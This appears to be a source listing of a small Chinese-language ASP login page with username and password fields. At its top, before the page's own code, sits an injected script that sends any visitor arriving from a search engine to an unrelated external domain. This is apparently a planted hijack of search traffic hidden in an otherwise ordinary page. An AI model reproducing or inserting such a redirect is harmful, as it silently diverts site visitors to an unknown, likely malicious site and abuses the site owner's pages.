d:\wwwroot\wuchunhua\cookies\index.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>
<%
@LANGUAGE="VBSCRIPT" CODEPAGE="936"
%
>
002:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
003:
<html xmlns="http://www.w3.org/1999/xhtml">
004:
<head>
005:
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
006:
<title>数据库的登录cookies</title>
007:
008:
<style type="text/css">
009:
<!--
010:
body {
011:
background-color: #99CCFF;
012:
}
013:
-->
014:
</style>
<!--mstheme 文件夹没有这个文件-->
<link rel="stylesheet" type="text/css" href="../_themes/sky/sky1011-106.css">
015:
<meta name="Microsoft Theme" content="sky 1011, default">
016:
</head>
017:
018:
<body>
019:
020:
<form name="form" method="post" action="chuli.asp">
021:
<!--表格:输进去后跳到 处理chuli。asp查询UserName和pass-->
022:
023:
<p>用户
024:
<input class=itm name=UserName size=15>
025:
</p>
026:
<p>口令
027:
<input class=itm name=Pass size=15 type=password>
028:
<br>
029:
<br>
030:
<input type="submit" name="Login" value="登录(模板名字和密码123)">
031:
<input type="reset" name="Reset" value="重设">
032:
</p>
033:
</form>
034:
035:
036:
</body>
037:
</html>
038:
039:
040: